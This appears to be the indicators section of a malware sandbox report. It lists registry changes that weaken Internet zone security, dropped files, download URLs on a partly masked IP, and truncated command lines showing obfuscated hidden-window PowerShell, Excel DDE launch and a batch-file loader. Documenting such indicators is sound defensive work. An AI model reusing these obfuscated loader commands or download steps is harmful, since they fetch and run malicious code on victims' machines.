Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %APPDATA%\purchasedb.xlsx
- %APPDATA%\~$purchasedb.xlsx
- %APPDATA%\gogis.bat
- '19#.#8.251.169':7287
- http://19#.##.251.169:7287/PurchaseDB.xlsx via 19#.#8.251.169
- http://19#.##.251.169:7287/gogis.bat via 19#.#8.251.169
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){[IO.File]::WriteAllBytes($SBAMeJuWZ, $CZAXshoWnad)};function qHQDgYXJPBUhEu($SBAMeJuWZ){if($SBAMeJuWZ.EndsWith((NPsijwh...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\gogis.bat" "
- '%WINDIR%\syswow64\cmd.exe' /K "%APPDATA%\gogis.bat"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo $host.UI.RawUI.WindowTitle='%APPDATA%\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHe...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe'